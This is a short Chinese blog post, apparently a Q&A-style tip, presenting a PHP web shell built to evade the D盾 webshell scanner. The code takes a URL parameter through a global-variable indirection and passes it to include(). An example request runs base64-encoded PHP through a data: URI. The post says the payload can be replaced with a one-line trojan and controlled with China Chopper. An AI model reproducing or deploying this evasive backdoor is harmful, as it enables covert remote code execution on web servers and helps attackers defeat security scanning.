去年分析D盾的查杀规律弄的绕过。
查杀效果:
具体请看代码:
<?php
function cc(){
global $b;
$a =$_GET[$b]; //此处可改成POST方式
$str =$a;
return $str;
}
?>
<?php
$b="url";
$c=cc();
$aa = $c;
include($aa);
传入参数方式:
http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)
例如:
http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
上看base64,后面为要执行的代码,代码要带,实战中可以把代码改成一句话,然后使用菜刀连接即可。
本文介绍了一种通过修改PHP代码结构来绕过D盾安全检测的方法,利用GET请求动态加载本地或远程文件,实现木马绕过。实战中可将代码简化为一句话木马,便于使用菜刀等工具进行连接。
1903

被折叠的 条评论
为什么被折叠?



